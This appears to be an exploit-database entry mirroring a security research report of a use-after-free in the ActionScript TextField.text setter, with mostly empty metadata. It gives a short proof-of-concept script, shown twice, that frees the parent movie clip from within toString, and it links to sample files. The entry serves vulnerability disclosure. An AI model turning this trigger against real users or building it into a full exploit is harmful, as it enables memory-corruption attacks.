Use-after-free in TextField.text setter

vendor:

N/A

by:

N/A

CVSS

N/A

Use-after-free

N/A

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

Use-after-free in TextField.text setter

There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows: var mc = this.createEmptyMovieClip('mc', 101); var tf = mc.createTextField('tf', 102, 1, 1, 100, 100); tf.text = {toString : func}; function func(){ mc.removeMovieClip(); // Fix heap here return 'natalie'; } A sample swf and fla are attached.

Mitigation:

N/A

Source

Exploit-DB raw data:

Source:  https://code.google.com/p/google-security-research/issues/detail?id=576

There is a use-after-free in the TextField.text setter. If the text the field is set to is an object with toString defined, the toString function can free the field's parent object, which is then used. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.text = {toString : func};

function func(){

	mc.removeMovieClip();

        // Fix heap here

	return "natalie";
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39053.zip